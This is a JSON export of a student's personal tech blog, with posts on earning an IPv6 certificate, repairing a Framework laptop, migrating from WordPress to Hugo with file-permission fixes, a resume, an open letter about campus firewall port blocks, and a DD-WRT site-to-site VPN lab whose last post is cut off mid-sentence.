[{"content":"Going into the networking and IT industries, one of the common things you\u0026rsquo;re met with is certificates. Some of the more common ones include the CCNA and the CompTIA A+ certifications, with some of the more niche and situation-specific including PCNSA, CCNP, and CompTIA Security+ certifications. My first, however, was none of those. It was the Hurricane Electric IPv6 certificate, and it was by complete accident.\nBackground I first stumbled across Hurricane Electric through their IPv6 tunnel broker program in early 2024, where they would allocate a routed /48 to you for completely free. All you needed was a routed IPv4 address that would respond to pings. While I was never able to get it successfully set up, likely due to me still learning OPNsense at that time.\nAs one does on an inherently technical in nature webpage, I clicked around and found they had an IPv6 certification program. Naturally, I let my curiosity take control to see how far I could get with it without having done any research into it or even a routed IPv6 address. After achieving Newbie status easily, I was unable to move past that due to the requirement of having to access from an IPv6 address. With me still being in the middle of the semester, I decided I\u0026rsquo;d put a pin in that until the summer.\nPicking it back up The date is now January 12th, 2025. It\u0026rsquo;s the night before the spring semester of classes start, and I\u0026rsquo;m figuring out what devices have IPv6 addresses with my cat to my side. Out of nowhere, I remember that I was looking into Hurricane Electric for getting IPv6 back where I used to live, and how I was trying to get through what I thought was a connectivity quiz. As such, I pull it back up and see how much further I can get with it.\nExplorer The enthusiast tier could mostly be described as understanding what an IPv6 address looks like. The difficult part of this tier for me was due to my lack of IPv6 connectivity when I initially tried to do this. I deemed it not important enough turning on my phone\u0026rsquo;s hotspot on just to get past this and just made a mental note for me to do that whenever I was on my hotspot. Yeah that never happened, or else this would be published in June.\nAfter connecting with an IPv6 address (still not through Hurricane Electric\u0026rsquo;s tunnel), I answered the quiz covering extremely basic diagnostics and confirming I know what an IPv6 address looks like.\nEnthusiast This step involved having a website that had IPv6 connectivity. However, I\u0026rsquo;ve had one for the past 3 years: https://www.monicarose.tech. While I wish I could say I set this blog up with one of the goals to be achieving an IPv6 certificate, the title of this post is about how I got a certificate by accident.\nQuestions were extremely leading, pushing you toward using IPv6 alongside some hilarious multiple choice questions, which was trivially easy to just click through and move on.\nAdministrator This step was marginally more difficult for the technical aspect of it, which was making sure if I had a working mail server that had IPv6 connectivity. And for the past 2 years, that was a yes for me. If you\u0026rsquo;ve sent an email to an @monicarose.tech email address, that was sent to a self-hosted mail server. I could insert another joke about this all being planned, but no it wasn\u0026rsquo;t.\nFor the homelabbers out there who are hesitant to use cloud providers, it\u0026rsquo;s entirely possible your ISP allows SMTP traffic, both inbound and outbound. I know I have friends who are running their own mail server from their residential networks without any issues. However for those whose ISP has blocked inbound SMTP, it\u0026rsquo;s possible you can get away with this with a gmail or outlook email address. However, that much is an exercise for the reader.\nBy the time I had configured the mail server, I had largely moved on from addressing servers by IP address and had started using DNS to address things as much as possible. Outside of this certification, I personally feel that addressing things by DNS rather than IP addresses is one of the biggest hurdles for IPv6 adoption, since it\u0026rsquo;s either not common knowledge that DNS records can point to private IPv4 addresses or some DNS providers refuse to use private IPv4 addresses. In my experience, OPNsense (and presumably pfSense by extent) blocks resolution of DNS queries that result in a non-routed IP address, but this is easy to disable and, in my opinion, poses little security risk.\nAs far as the questions were concerned, most of these were concerned about my experience with the certification process, with one ahem \u0026ldquo;technical\u0026rdquo; question. At risk of repeating myself, this was trivially easy to click through and move on.\nProfessional While not entirely difficult for me, this might be the stumbling block for people wanting to take this test at home. For full transparency, I used my blog\u0026rsquo;s website for most of this process, which is being hosted on a $5/month server from Linode. They made it extremely easy for me to change the rDNS for that IPv6 address, but if this is being done in a homelab environment, I fully acknowledge this may be flat out impossible for some people. I didn\u0026rsquo;t look into if Hurricane Electric allowed me to change the rDNS on my range that I allocated.\nThat acknowledgement out of the way, hypothetically if I hadn\u0026rsquo;t already changed the rDNS, it would\u0026rsquo;ve taken a couple clicks and entering in monicarose.tech, possibly with waiting a few minutes for any DNS caches to expire. However, since I had already completed that in the process of me setting up my mail server, I could once again validate my rDNS record and continue on to the questions\nQuestions, once again, included surveying about the certification process, notably if I had any issues configuring IPv6. Seeing as I\u0026rsquo;ve yet to configure the Hurricane Electric tunnel on OPNsense, it\u0026rsquo;s fairly safe to say that yes, I have had some trouble. That being said, my apartment is using IPv6 with OPNsense and have had little to no issues, even being able to request a /56 and subnet that out.\nGuru If you\u0026rsquo;ve gotten past the rDNS part successfully, congrats! You can most likely coast out the technical parts from here. Unless for some reason your DNS provider itself doesn\u0026rsquo;t have IPv6, you can likely click past this just fine, including yes, the questions.\nSage This was the part for me that was by in large the most difficult part, mostly due to the questions before being \u0026ldquo;how do you feel about this certification process so far\u0026rdquo; and me having already done the hard work for the technical stuff already. As I eluded to in the Administrator section, this was heavily centered around resolving IPv6 addresses in DNS, including knowing some of the major authoritative domains and how to query domains and subdomains. If you aren\u0026rsquo;t familiar with either the terms IPv6 glue or glue records, then you\u0026rsquo;re probably going to struggle a bit on this.\nPersonally I had to retake it a few times, though my experience with diagnostics in the past, including a labbing server that had IPv6-related issues for an unknown amount of time, aided me dramatically. Since all of these questions aren\u0026rsquo;t surveying your experience but rather you, there are correct answers. If you were planning on taking this certification, you probably would\u0026rsquo;ve reviewed some of the lectures Hurricane Electric have on their certification website. But if you went into this completely blind like I did, there\u0026rsquo;s no repercussions for retaking that test multiple times, as what\u0026rsquo;s tested is just the Sage tier questions.\nConclusion Normally, it is heavily advised to study for the certifications you\u0026rsquo;re jumping for. And that absolutely stands true for this no less, especially given how difficult setting up everything it asks for can be. This process isn\u0026rsquo;t an overly expensive one by any means. My domain, monicarose.tech, costs me roughly $50/year, with a cloud server able to do web and mail hosting at about $5/month. I\u0026rsquo;ll fully acknowledge that I\u0026rsquo;m on the upper end of how much this could cost, especially with being able to get domains for cheap as $1/month if you don\u0026rsquo;t care about the name or the top-level domain that you have.\nHowever, if you set it up from the perspective that I had where you want it to set things up as completely as possible, if you have IPv6 access, it doesn\u0026rsquo;t hurt to be as IPv6 ready as possible. Even if you only got up to the professional tier, what you have shown along the way is that you are aware that IPv6 is very much a thing and have set up web and mail servers to be compatible with it. Even if it doesn\u0026rsquo;t net you a certificate, being able to show that you can properly configure services around IPv6 carries some weight to it.\nThis IPv6 certificate will likely be one of the ones that sits lower on my resume, but that\u0026rsquo;s because I\u0026rsquo;m already planning on getting CyberOps Associate certified and CCNA certified in the relatively near future, and especially the CCNA has some elements of the HE IPv6 certificate in it.\n","permalink":"https://www.monicarose.tech/posts/i-got-my-first-certificate-by-accident/","summary":"Going into the networking and IT industries, one of the common things you\u0026rsquo;re met with is certificates. Some of the more common ones include the CCNA and the CompTIA A+ certifications, with some of the more niche and situation-specific including PCNSA, CCNP, and CompTIA Security+ certifications. My first, however, was none of those. It was the Hurricane Electric IPv6 certificate, and it was by complete accident.\nBackground I first stumbled across Hurricane Electric through their IPv6 tunnel broker program in early 2024, where they would allocate a routed /48 to you for completely free.","title":"I got my first certificate, and it was by accident"},{"content":"How many of you have heard of Framework, the company that\u0026rsquo;s right to repair first? Some people I know that have seen one, whether online or in person, called their modularity and repairability a party trick that\u0026rsquo;s nothing meaningful, deemed it overpriced, or complained about the 3:2 aspect ratio screen. However, what if I said that the first two points - the modularity being a party trick and being overpriced - just need time to prove their potential? Well, let me tell a story from March 2024 about how my stupidity and haste paid mine off with one mistake.\nSetting the Scene As part of my duties for my job, I had to reset a bunch of switches and routers back to factory defaults so that they could be used for networking classes. These devices, like a lot of enterprise networking gear, are driven by a serial console, thus they need to be managed by a separate computer. Further, unless there are multiple free USB ports for multiple USB-to-serial adapters or a computer has multiple serial controllers built in, it\u0026rsquo;s not uncommon for only one computer to manage one device at a time. The computers that were being used to reset this equipment could not be connected to the lab\u0026rsquo;s network due to their age or lack of wifi, requiring me to have my laptop pulled up with the stuff I need available for work. All of this added up for me to have multiple computers in front of me\nOne quiet, Thursday morning right before spring break, I was continuing to reset these switches. I had just reset a switch with my laptop nearby to monitor for possible upcoming appointments. I went to move the freshly reset switch to the pile of reset equipment so that I could later set up the pods needed for the students. The end of my shift was near, and after my one class for the day, I was ready to go home for the week-long break. In my haste, I picked up a Catalyst 2960 with a less than ideal grip, and I dropped the switch onto my laptop.\nThe Initial Panic On a first glance, the damage looked bad. I had cratered my delete key and, in my panic, I had assumed that I had damaged the motherboard and/or had slightly punctured the battery. The power light surrounding the power button had shut off, suggesting I had damaged some traces, possibly damaging the button. At this point, I had concluded that my laptop was effectively totaled and was possibly a fire hazard. Like most people, one of the major reasons why I bought a Framework laptop was due to the repairability. In fact, I\u0026rsquo;ve done multiple repairs on my laptop before this, some voluntary like upgrading my storage or getting more memory and some involuntary like replacing the keyboard due to my cat ripping of some keys. However, there were some contributing factors to my warped perception of the damages:\nI needed my laptop for a class that started an hour after I was supposed to clock out. Spring break was fast approaching, and I would be going home the next day. This factor meant that ordering parts would be complicated as I didn\u0026rsquo;t know how long it would take to deliver. I needed my laptop for work. A Fresh Set of Eyes After leaving my laptop in my room and going to class as the battery was almost dead, I was able to get a fresh set of eyes and reassess the damages. Immediately, I was able to put a lot of my concerns to rest, as I discovered that the area had an expansion card underneath it, meaning that at most, the total damages would\u0026rsquo;ve been a new keyboard and a new USB-C expansion card. As luck would have it, even though the crater was rather large, the expansion card could still be removed, albeit with some effort. And as a bonus, the card came out mostly unscathed, save for a slight dent. But the question is, what about the key that had so heavily impacted. Surely that portion of the keyboard, or at the very least that key was damaged, right?\nYour browser does not support the video tag. If my reaction wasn\u0026rsquo;t enough of a hint enough, I wasn\u0026rsquo;t expecting that one. I had a fully functional laptop despite the full weight of an enterprise-grade switch being dropped onto the delete key.\nThe Damages After some initial troubleshooting, I had concluded that the only damages were cosmetic, with the keyboard taking the brunt of the damage. The bulging dent in the chassis was able to be massaged back into place, other expansion cards could be used in that affected slot, and the expansion card that was in that slot was still functional. The only thing I ultimately ended up replacing was the input cover, running me a grand total of $100.\nIf I bought a Framework laptop for the repairability and I could get the keyboard standalone, why didn\u0026rsquo;t I get that? The short answer is that I didn\u0026rsquo;t feel like spending an hour of my life screwing, the long answer is in addition to that, I thought that I had damaged my laptop further when I had upgraded my battery to a 61Wh battery the week before. As I later found out, this was part of the quirks of that mainboard since that was an 11th gen Intel board from wave 3, with that loss just happening to coincide with that upgrade. In other words, I bought it while it was still a beta product, and the issue only showed itself as a red herring.\nThe Takeaways Whenever these relatively notable events happen, I like to think about the takeaways. While this happened in March 2024, I didn\u0026rsquo;t start writing this post until November 2024, and in that time I\u0026rsquo;ve had a chance to reflect on this, and I think this series of unfortunate events can be boiled down to three key points:\nA device meant to be repaired may cost more up front, but mistakes on your off days will help pay that off in the long run. In the heat of the moment, it is trivially easy to make a situation seem worse than it actually is. Should something get damaged, the worst thing you can possibly do is to not test it. ","permalink":"https://www.monicarose.tech/2025/01/my-framework-laptop-paid-itself-off-thanks-to-my-stupidity/","summary":"How many of you have heard of Framework, the company that\u0026rsquo;s right to repair first? Some people I know that have seen one, whether online or in person, called their modularity and repairability a party trick that\u0026rsquo;s nothing meaningful, deemed it overpriced, or complained about the 3:2 aspect ratio screen. However, what if I said that the first two points - the modularity being a party trick and being overpriced - just need time to prove their potential?","title":"My Framework laptop paid itself off, thanks to my stupidity"},{"content":"In the span of about 3 days, I successfully migrated my blog to use Hugo as my backend. Hugo (no, not the 2011 movie) is a static site generator that allows you to write Markdown files, and then creates HTML files from them. As you might guess from that blurb, Hugo itself is not hosting the content, but rather adapting the content to a web friendly format.\nReasons There are a few major reasons for why I jumped to Hugo from my WordPress-based website, which can be summarized to 4 key points: speed, backups, flexibility and freedom, and potential liability.\nFaster Quite frankly, I don\u0026rsquo;t use a fraction of the features that WordPress offers. My blog has no shop associated with it, comments have been disabled for a long time, and I was barely using any plugins with it. And while WordPress is feature-rich, it comes with the consequence of being a heavy weight in system load, especially given that I\u0026rsquo;m hosting on a Nanode from Linode with 1 core and 1 GB of RAM.\nIn addition to the user-facing performance benefits, there\u0026rsquo;s also the admin experience. For me to log in, draft up a post, and publish it, the process was too convoluted for someone who is a one-man army. If I logged in from a different location or even a different tab, who knows what version I was getting or what version would be saved. This further contributed to the writers blocks, where I\u0026rsquo;d have to remember where I was and what I wanted to write about.\nBackups Because everything is a Markdown file, everything can be stored in a git repo. While having the entirety of my website in a git repo has additional benefits that will be outlined later, the ability to utilize the robustness of git means that I get baked in revisions and I can store it wherever I want.\nFreedom and Flexibility WordPress runs on top of a LAMP, or Linux, Apache, MySQL, and PHP stack. Having these four distinct, components comes with benefits to high availability, load balancing and manageability, among other things. The double-edged sword of that last point, the manageability, is how difficult it is to manage. For a simple website, it\u0026rsquo;s not uncommon for all four components to run on the same server, often with low system resources available. That last detail means it\u0026rsquo;s easy for one component to accidentally kill another. While I have uptime monitoring through Uptime Robot and Uptime Kuma, there were multiple situations where there was partial functionality or the only working page would be the index page, resulting in false positives.\nFurther, since these files are pregenerated HTML, CSS, JavaScript, and pictures, more flexibility is offered with where I store it, how I serve it, or where I serve it. I may presently be using Apache2 on a 1GB Nanode to serve and store the files, but there is nothing stopping me from storing the files on a Backblaze B2 bucket, served using Caddy on a Digital Ocean droplet, and the complete change would be transparent to the end user.\nThe flexibility offered in serving statically generated HTML files means that I was able to add pages that deviated from the standardized template, with the very first example being of [a resume page][https://monicarose.tech/resume], permitting me to consistently keep an up-to-date and easy to modify resume in the future. That, combined with me already using Markdown-based files for my notes in class means that it\u0026rsquo;s quick for me to draft up a professional appearing post.\nAutomattic/WP Engine Drama I had been looking at migrating my blog to something that allowed me to write Markdown-based content, with some naive implementations of on-the-fly Markdown to HTML conversion, but never got the results that I was looking for. However, when the WordPress Foundation changed their trademark policy on how you could use the terms \u0026ldquo;WP\u0026rdquo; or \u0026ldquo;WordPress\u0026rdquo;, specifically calling out WP Engine as an example of infringement, using any form of WordPress felt like a liability, being the driving force that pushed me to migrate away.\nPrep To prepare for migrating, I set up a git repo on my personal Gitea instance to provide a place to push my content to. After an initial commit, I set up a container on my Proxmox server and set it up so it mirrored my public-facing web server, substituting the LAMP stack for Apache and Hugo. Further, after doing some quick research, I found that Drone was a commonly used CI/CD pipeline with Gitea.\nAfter deploying Drone and a basic pipeline, including one of the many Hugo plugins for Done and an rsync plugin for Drone, I refined the pipeline as much as I could until I got successful deployment. This allowed me to focus more on migrating the content and learning how to integrate static content like images. To migrate the content, I discovered wp2hugo, a tool written in Go that takes your WordPress export and adapts them to Markdown files. Committing these, I finally had a baseline to push to production.\nDeploying to Production To deploy to production, I knew there was one major obstacle I\u0026rsquo;d have to overcome. In addition to an iptables based firewall on the VM itself, I additionally am utilizing Linode\u0026rsquo;s firewall rules. As my Drone instance is deployed in my homelab, I had to work around the issues concerning a dynamic IP. As Linode\u0026rsquo;s firewall, to the best of my knowledge, doesn\u0026rsquo;t allow me to do a reverse DNS lookup for a rule, I wrote a simple Python script and a docker container that will update the firewall. By no means is it perfect, but should be good enough for a basic implementation.\nAfter confirming that script worked, I added the SSH key for the CI/CD pipeline, modified the permissions so that elevating to root wouldn\u0026rsquo;t be necessary, and backed up the WordPress website just in case issues occurred. Predictably, issues did occur, particularly around permissions.\nWhile the website shouldn\u0026rsquo;t have any server-side executable code on it, it\u0026rsquo;s still good practice to limit permissions as much as possible. Now with that in mind, let me provide this script from my CI/CD pipeline, and tell me if you see any issues here:\nchown -R mhanson:www-data /var/www/monicarose.tech/ chmod -R 640 /var/www/monicarose.tech/ By a show of hands, how many of you caught the error? Still not? Let me throw in the verbose output and the resulted directory listing: Still don\u0026rsquo;t see it? Because for about 20 minutes, I didn\u0026rsquo;t catch it. I feel as though Unix permissions are fairly self explanatory with one exception: directories need to be executable for it to be navigable. The more correct syntax is:\nchown -R mhanson:www-data /var/www/monicarose.tech/ find /var/www/monicarose.tech/ -type d -exec chmod 750 {} \\; find /var/www/monicarose.tech/ -type f -exec chmod 640 {} \\; To break down the changes, the last two lines use the find command to set the permissions of directories (The second command, using -type d) and files (The third command, using -type f) independently of each other, allowing the directories to be executable and, as a result, navigable.\nTakeaways Quite frankly, the main takeaway from this migration is to mirror your development environment as much as possible. Permissions and ownership issues would\u0026rsquo;ve been caught early on if I had taken the time to set up a low privilege user in my development environment. Between that and taking more time with testing locally, I feel as though most of the issues would\u0026rsquo;ve been caught early on.\n","permalink":"https://www.monicarose.tech/2024/10/migrated-blog-to-hugo/","summary":"In the span of about 3 days, I successfully migrated my blog to use Hugo as my backend. Hugo (no, not the 2011 movie) is a static site generator that allows you to write Markdown files, and then creates HTML files from them. As you might guess from that blurb, Hugo itself is not hosting the content, but rather adapting the content to a web friendly format.\nReasons There are a few major reasons for why I jumped to Hugo from my WordPress-based website, which can be summarized to 4 key points: speed, backups, flexibility and freedom, and potential liability.","title":"I Migrated My Blog to Hugo"},{"content":"Work Experience Southeast Missouri State University Senior Learning Assistant (January 2024 - Present)\nAssisted students with learning networking topics Coordinated teams to lower barriers for help Created material to help teach topics Wrote programs to automate repetitive tasks Trained Learning Assistants on procedures Observed Learning Assistants\u0026rsquo; sessions to provide feedback Education Southeast Missouri State University B.S. Cybersecurity (August 2022 - Present)\nExpected graduation date: May 2026 Designed networks implementing good practice security measures Modified programs to protect against common attacks B.S. Computer Networking System Administration (January 2024 - Present)\nExpected graduation date: May 2026 Set up and deployed highly available Proxmox clusters Configured network imaging to automate system deployment Computer Science Minor\nCertifications Cisco Certified Network Associate (Verify Status) Hurricane Electric IPv6 Sage Rank Skills Windows Ubuntu Linux Proxmox VE TrueNAS Core OpenVPN Cloud Computing TrueNAS Scale Windows Server Python OPNsense Firewall Routing Switching Subnetting Vlans Red Hat Enterprise Linux Golang Wazuh FOG Project Featured Projects CiscoResetterGo\nAutomates resetting Cisco products over serial, including Catalyst 4221 routers and Catalyst 2960 switches Written entirely in Go, with web interface utilizing net/http and gorilla/mux Primitive default setting applications ","permalink":"https://www.monicarose.tech/resume/","summary":"Work Experience Southeast Missouri State University Senior Learning Assistant (January 2024 - Present)\nAssisted students with learning networking topics Coordinated teams to lower barriers for help Created material to help teach topics Wrote programs to automate repetitive tasks Trained Learning Assistants on procedures Observed Learning Assistants\u0026rsquo; sessions to provide feedback Education Southeast Missouri State University B.S. Cybersecurity (August 2022 - Present)\nExpected graduation date: May 2026 Designed networks implementing good practice security measures Modified programs to protect against common attacks B.","title":"Monica Hanson"},{"content":"Imagine this: you\u0026rsquo;re running a web hosting service and you need to connect in to add another client who has specific needs your setup script doesn\u0026rsquo;t account for. You try to connect via SSH, but it hangs. After hanging, you escape out of the session and reconnect with the verbose flag set. You notice the wrong IP address, and you realize that you set up Cloudflare proxying. So you SSH in to the server with the public facing IP address, to find out it\u0026rsquo;s still not connecting. You can ping the server just fine and you can even access the website just fine. Maybe you accidentally banned yourself from accessing the server via SSH. So you log in to your server provider\u0026rsquo;s website and open up the server. You see that your IP isn\u0026rsquo;t banned and the SSH service is running just fine. The variable you didn\u0026rsquo;t account for was where you\u0026rsquo;re logging in from: the network you\u0026rsquo;re connecting from has outbound SSH blocked.\nAs that opening paragraph suggests, this is a situation I had to deal with when I first transferred to SEMO. The image that I used to deploy multiple WordPress websites with used PHP 7.4, and I had to upgrade many of those websites to PHP 8.1. However, I was unable to SSH in to those servers due to a firewall rule on SEMO\u0026rsquo;s network. While I was able to get those servers upgraded to use PHP 8.1 that day by logging in through the console, ensuring I had proper backups prior to those upgrades was made drastically more difficult.\nIt\u0026rsquo;s not just SSH Around the same time as running those upgrades, I decided to embark on another project: writing my own Twitch chat bot. Twitch\u0026rsquo;s chat utilizes the IRC protocol, which is usually a plain text service. Among other things, IRC is still used today for real time support channels akin to a Discord server. However, when trying to test things to see if I was able to successfully connect to the server, I kept getting connection timed out warnings. After generating a GitHub personal access token to push my code to a repository since outbound SSH was blocked and running it in my labbing cloud server, I discover that it works fine there. Seeing as how widespread IRC is, I try a generic IRC client on my main computer to see if I can connect in to a Twitch chat. That answer was no.\nSimilarly, around that time I got the idea that I wanted to try figuring out how to send and receive emails using my own mail server, with the intention on learning how email works on a lower level and what security practices can be put in place for a secure but effective email server. Naturally, this was harder to diagnose as I was not only reliant on the firewall allowing outbound SMTP, but also that the cloud provider\u0026rsquo;s firewall wasn\u0026rsquo;t blocking SMTP and my configuration was working correctly. I could rule out my cloud provider\u0026rsquo;s firewall wasn\u0026rsquo;t blocking SMTP as I submitted a ticket to have that restriction removed from my account. Additionally, I was able to confirm I could send emails via Postfix to a Gmail account. That suggested that port 25 was open. However, trying to use netcat or telnet to connect to the instance, I couldn\u0026rsquo;t access it.\nDetermining why the blocks existed After having experienced those issues and being able to rule out it was neither my computer nor the servers at fault, I did what any sane person did: submit a ticket about the rules. After all, I\u0026rsquo;m trying to do my job and manage these web servers that clients are paying me for. Two months later, a possible lead turns in to pushing me to use the student VPN. A VPN that I am not able to use because of my personal machines running Linux and using a Windows exclusive installation method, not to mention still not solving the root issue. Attempting to circle back on the root issue results in radio silence. Following up after a month and discovering yet another blocked service: 9001 for the portainer agent, results in more radio silence. Following up two months later again (we\u0026rsquo;re now in December, four months after I moved in), still silence. At this point, I escalate it to a Missouri Sunshine request. You can read some more information on my post on the Open Information Committee for more details on that, as that is outside the scope of this post. However, in spite of raising the issue initially a year ago as of the writing of this, it still hasn\u0026rsquo;t been addressed.\nCircumvention, Discrepancies, and the Consequences Out of curiosity, I decide to try changing the SSH port one my labbing cloud server to a different port. That curiously works, suggesting the firewall merely blocks ports, not services. The easiest solution would be to change each of the ports that are blocked to ones that aren\u0026rsquo;t blocked. Further, this process was facilitated by a script I wrote, Port Knocker, to see what ports were available. Ports 3306, 1433, 1434 are blocked, which usually are associated with database servers like MySQL and Microsoft SQL. Normally it would be trivial to change the ports that they\u0026rsquo;re listening on, however services that depend on a SQL server usually assume the respective ports they use, with a layer of difficulty trying to change that in the event you use a different port. Furthermore, you\u0026rsquo;re heavily restricted to using third party servers like GitHub, as they made the decision to remove password based authentication in August 2021, favoring git over SSH instead or using a personal access token if you decide to stick with using git over HTTPS.\nUsing the aforementioned script, I discovered several discrepancies. For instance, port 22, the port commonly used by SSH, is blocked but port 23, the port commonly used by telnet, isn\u0026rsquo;t blocked. Further, port 21, the port commonly used for FTP, isn\u0026rsquo;t blocked either. While a cynical person might point out that blocking SSH and not blocking Telnet or FTP would allow snooping on data, port 1723 appears to be blocked as well, the port used for PPTP with the L2TP, IPsec, OpenVPN, and Wireguard ports all being left open. Additionally, while SSH would be blocked in its default settings, you can still use the remote desktop protocol\u0026rsquo;s default port of 3389 or VNC\u0026rsquo;s default port of 5900.\nHypocrisy One of the additional issues in this particular context is the hypocrisy. A couple of SEMO\u0026rsquo;s majors are Computer Networking Systems Administrator and Cybersecurity, with both of those having a fundamental need to remotely manage networking appliances and servers. Furthermore, a required course for Computer Science, Computer Information Systems, and Cybersecurity is a database class, which the course description describes it as the following:\nBasic concepts of database and database architecture. Discussion of entity-relationship and relational database models. Study of the SQL query language. Study of database design methodology.\nhttps://semo.edu/student-support/academic-support/registrar/bulletin/courses/index.php\nWhile it doesn\u0026rsquo;t inherently call out a database software used, it could be assumed that something akin to MySQL or Microsoft SQL is being used to learn on. As I haven\u0026rsquo;t taken the course, that is purely speculation, but is a worth while detail to mention.\nFurthermore, your physical location appears to make a difference, as the networks available to you on campus if you\u0026rsquo;re a student vary on if you\u0026rsquo;re in a dorm building or not, with the latter being more permissive, allowing services like outbound SSH.\nMy Plea: Configure Your Firewalls Correctly If your intents are to block access to external devices, please configure your firewalls consistently and block each of the remote ports, including VNC, SSH, Telnet, and RDP. If you wish to block file transfers, don\u0026rsquo;t just block SSH and NFS, but also block FTP and FTPS. Even then, those dedicated to getting access to their external services will find ways around, such as changing ports or doing things over a VPN.\nI\u0026rsquo;m not asking for access to computers inside of the network using computers from outside, but access to computers outside of the network from the inside. To add to it, the inconsistent rules of the network based solely on where you\u0026rsquo;re located on campus makes it more difficult to predict what we will be able to access. I\u0026rsquo;m not asking for no firewall rules, as a firewall is fundamental to our network security. We\u0026rsquo;re not asking to host various services in our dorms, since we agreed in the terms of service we signed that we would not be hosting any types of servers on campus. What I\u0026rsquo;m asking for is for us to use the tools available to us and should be actively practiced, especially if it\u0026rsquo;s part of our major. What I\u0026rsquo;m asking for are consistent rules across campus. What I\u0026rsquo;m asking for is to allow us to work from home in this increasingly work-from-home environment and to keep our hobbies such as homelabbing or programming.\n","permalink":"https://www.monicarose.tech/2023/08/configure-your-firewalls-correctly-an-open-letter-to-sysadmins/","summary":"Imagine this: you\u0026rsquo;re running a web hosting service and you need to connect in to add another client who has specific needs your setup script doesn\u0026rsquo;t account for. You try to connect via SSH, but it hangs. After hanging, you escape out of the session and reconnect with the verbose flag set. You notice the wrong IP address, and you realize that you set up Cloudflare proxying. So you SSH in to the server with the public facing IP address, to find out it\u0026rsquo;s still not connecting.","title":"Configure Your Firewalls Correctly: an Open Letter to Sysadmins"},{"content":"Admittedly, I\u0026rsquo;m pretty unfamiliar with VPNs, especially with setting up VPNs on routers. I\u0026rsquo;ve followed the excellent guide by egc to set up VPNs for my individual clients, such as my desktop or my laptop. However, one of the next logical steps is to learn how to set up a site-to-site VPN with DD-WRT. One of the issues with deploying it right now is that I\u0026rsquo;m currently an hour away from the other location. While I could easily set up a remote desktop solution with the likes of Rustdesk or TeamViewer, it\u0026rsquo;s still responsible to test it first in a virtual environment before deploying it in a production environment.\nThe Virtual Environment To emulate the production deployment as closely as possible, I spun up two virtual machines in VMWare Workstation using DD-WRT build r50906 from 11/18/2022, specifically the x86_64 build. I also ended up using a Kali Linux and a Windows 11 Development image, both of which were the official OVF files from their respective websites. These would emulate web servers that would confirm connectivity between the two endpoints. In addition to that, I created two host-only network adapters with no DHCP service running. I deliberately chose the host-only because I wanted the servers to only communicate to each other through the DD-WRT virtual machines.\nVM DD-WRT Site 1 DD-WRT Site 2 Windows 11 VM Kali Linux VM WAN IP 10.0.0.202 10.0.0.94 10.0.0.202 10.0.0.94 LAN IP 10.77.77.1 10.75.75.1 10.77.77.91 10.75.75.96 Subnet 255.255.255.0 255.255.255.0 255.255.255.0 255.255.255.0 Promiscuous Mode Nightmares One of the first hurdles that I ran into that I was not expecting to run into was DD-WRT being adamant on using promiscuous mode, of which VMWare was very unhappy about.\nAcross both virtual machines and both network adapters per VM, this error would get thrown\nWhile it\u0026rsquo;s plausible I configured something incorrectly, I followed the link provided to solve the issue. The solution suggested was to create a group that had read and write permissions for the virtual network adapters and add myself to that group. After doing just that, it booted without any issues.\nFirst Time Setup I would be lying if I said that the setup process was painless, because it was far from it. I spent probably a good part of a couple hours just troubleshooting my network connectivity issues. Sometimes I would get have a connection for 5 minutes, sometimes an IP address wouldn\u0026rsquo;t be given out at all, sometimes it would get an IP address but wouldn\u0026rsquo;t connect to the web interface, sometimes it would cooperate with one VM while the other didn\u0026rsquo;t want to even ping its router, and all in all it was wildly inconsistent. I tried mirroring the same build that I was using on my Netgear routers in my production deployment (r50671), I tried the latest version (as of me setting it up, build r50906) in x86, I even tried a pre-made OVF that I found on the DD-WRT forums, none of which worked out.\nAfter enough trial and error with different configurations, I found that, in order for DHCP to assign IP addresses, I needed the DD-WRT VMs to have a bridged connection. As a result, my production LAN served as a WAN for those DD-WRT VMs, which was fine by me as I could also determine how internet traffic was routed. While there were still some IP assignment issues with the default subnet, these were resolved after assigning its subnets previously mentioned.\nInitial VPN Configuration To begin toying around with VPNs, I followed the DD-WRT OpenVPN configuration guide using the Windows VM as the machine issuing the profiles and the site 1 router serving as the OpenVPN server. This guide was a known good guide as this is what I used to deploy my current VPN setup and is frequently updated (as of writing this the last edit was on 11/12/2022, just over a week ago as of when I\u0026rsquo;m writing this). After setting this up I ensured that the site 2 router could ping the site 1 router and, sure enough, it could. However, not everything was set up, as my Kali VM couldn\u0026rsquo;t see the Windows VM, and the Windows VM couldn\u0026rsquo;t see the Kali VM, either. However, this was expected, as I was just making sure that I could even connect the site 2 router to the site 1 router.\nUncharted Territory Note: in this section I\u0026rsquo;m posting lines from my configuration. If you are following this post as a guide, replace 10.77.77.0 with the subnet of the network running the server and 10.75.75.0 with the subnet of your remote network\nAt this point, I needed to route the specific traffic to each other. Surprisingly, it wasn\u0026rsquo;t that difficult. Referencing the guide before, all I needed to do was ensure that the inbound firewall on NAT was disabled on both the client and the server and add some routing statements to the \u0026ldquo;additional config\u0026rdquo; section, adding the following lines to the server:\nroute 10.77.77.0 255.255.255.0 vpn_gateway push \u0026#34;route 10.75.75.0 255.255.255.0 vpn_gateway\u0026#34; Additionally, I needed to add the following line to the \u0026ldquo;CCD-Dir DEFAULT File\u0026rdquo; section:\niroute 10.75.75.0 255.255.255.0 Another option that I did not initially check was changing the \u0026ldquo;Push Client Route\u0026rdquo; from \u0026ldquo;Default Gateway\u0026rdquo; to \u0026ldquo;Servers Subnet\u0026rdquo;. As a result of me missing this, it had caused me to lose internet connectivity on the remote network. After correcting this issue, internet connectivity was restored.\nFirewall Fun Now that, on paper, I had two remote sites set up, it was time to check it. I tried pinging the Kali VM with success. With the ping being successful, I was able to successfully access the Kali VM\u0026rsquo;s website. The other way around, on the other hand, I was unsuccessful with pinging the Windows VM or accessing the Windows VM\u0026rsquo;s website. I initially suspected it was a routing issue, so I tried pinging the site 1 router from the Kali VM with success. Trying to access that webpage using its local IP address was just as successful. That eliminated a possible routing issue, so I checked what was going on in the Windows VM.\nInitially, I checked the WAMP server running on the Windows VM as I suspected there was a configuration issue in the Apache config. While I did end up making a configuration change (in httpd-vhosts.conf, adding Require all granted), I doubt that played a significant part. After doing a bit of research, I found that Windows, by default, only accepts incoming network traffic from addresses on the same subnet as it. While the bodge solution was to just disable the firewall outright, the correct solution would\u0026rsquo;ve been to manually add a firewall entry for the server as Windows didn\u0026rsquo;t prompt if I wanted to add a firewall rule upon first run, although that may have been due to the firewall profile being set to public. After disabling the firewall, I was able to successfully ping the Windows VM from Kali and access the WAMP server.\nConclusion As I\u0026rsquo;ve found out through the firewall issues, there are plenty of red herrings when setting up something as inherently complex as a site to site VPN. The most obvious 